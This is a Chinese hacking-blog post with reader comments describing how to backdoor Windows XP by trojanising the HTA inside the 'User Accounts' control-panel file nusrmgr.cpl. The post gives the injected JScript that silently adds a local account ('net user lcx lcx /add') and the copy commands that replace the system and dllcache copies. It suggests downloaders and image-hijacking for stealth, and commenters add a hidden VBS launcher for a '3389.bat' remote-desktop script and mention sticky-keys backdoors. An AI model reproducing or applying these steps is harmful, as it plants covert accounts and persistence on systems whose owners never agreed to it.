利用cpl文件在xp中留一个后门

# 鬼仔:为了不让首页截断部分出现图片,因为把图片位置换了下,不知道lcx会不会介意。

作者:lcx

这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)

xpl_xp

我们在里边加几行js语句:

var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)

当然你加下载者更好,我只是做个示例。

然后:

echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl

替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。

这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。

相关日志

楼被抢了 18 层了... 抢座Rss 2.0或者 Trackback

  • ben

    的确现在这个比较鸡肋,首先要得到主机的权限——至少要可以修改这些文件,而且,必须要在对方调用的时候才能执行成功。不过这个发现的确很有趣。以前发现QQ的许多页面是HTML的,不过没想到微软也是这么做的。

    鬼仔老大,你的博客可真够猛的,我昨天看到lcx老大顺手留了个言,今天居然带过来好几个IP的访客,你真是我优质偶像啊,崇拜~

    • 颉少

      呵呵,我都崇拜鬼孜好多年了.我论坛里很多东西都是转鬼仔这的.嘿嘿,希望鬼仔不要介意,我都有注名来源的.

    • 鬼仔

      不能说鸡肋,是一种思路。
      是啊,lcx老大亲自来了,我也感觉很荣幸啊

  • chuxinake

    看了很久你的博客,这次终于我开口了
    可以往里面加个隐藏运行bat的vbs
    set ws=wscript.createobject(“wscript.shell”)
    ws.run “3389.bat /start”,0
    3389.bat里你想写什么酒可以写什么了

  • wavs1984

    恩 学习了 ~~膜拜一下

  • xiaoL

    鬼哥,一直在关注你BLOG。

    希望能做到经常更新。

  • virus8

    还是顶上去吧。呵~思路不错。呵

  • 枫子

    WP貌似可以自己写摘要把..

  • renenglish

    啥也不说了,你太强了,虽然是转的,但做到常常更新却不容易,你怎么做到的?

  • 老黄牛

    真是邪恶的东西啊

    感谢鬼仔这么好的博客啊

    总是有好玩的东西出现

  • 小海

    这个太强大了,提权方便了。

  • 帅,是一种寂寞

    这样提权,还不如用其它几个更加常用的XP
    1.粘滞键; 2.放大镜和语音快捷键后门; 对吧

发表评论